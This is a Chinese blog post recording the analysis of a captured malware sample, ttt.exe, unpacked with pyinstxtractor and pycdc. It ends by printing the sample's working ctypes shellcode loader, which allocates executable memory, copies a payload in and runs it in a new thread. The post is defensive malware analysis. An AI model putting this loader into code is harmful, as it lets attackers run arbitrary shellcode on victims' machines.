安全运营 | 记一次互联网捕获恶意样本分析

渗透技巧 3个月前 admin

38 0 0

从互联网捕获到一个恶意样本（ttt.exe）,因为网上有人在讨论，颇感兴趣，遂对其进行分析，将学习分析的过程记录一下。

查询威胁情报为可疑文件，包含部分可疑行为，并没有完全判断为恶意文件。

1、下载样本，初步判断为PyInstaller打包的python程序。

2、对编译打包后的python程序，反编译有两步：

1）将.exe反编译为.pyc

工具下载：https://github.com/extremecoders-re/pyinstxtractor/

使用pyinstxtractor进行反编译

python pyinstxtractor.py ttt.exe

安全运营 | 记一次互联网捕获恶意样本分析

通过输出结果判断，ttt.pyc为正确的程序入口点。

2）将.pyc还原为原始的py代码（pycdc.exe）

工具下载：https://github.com/zrax/pycdc

使用pycdc还原成py文件

安全运营 | 记一次互联网捕获恶意样本分析

成功还原出原始的python文件。

安全运营 | 记一次互联网捕获恶意样本分析

3、分析源代码，判断样本的功能如下。

安全运营 | 记一次互联网捕获恶意样本分析

将加密字符串解码后判断为shellcode加载器，可以分析出其核心功能是加载buf变量的内容。

ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(buf), 0x3000, 0x40)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(buf), len(buf))handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)ctypes.windll.kernel32.WaitForSingleObject(handle, -1)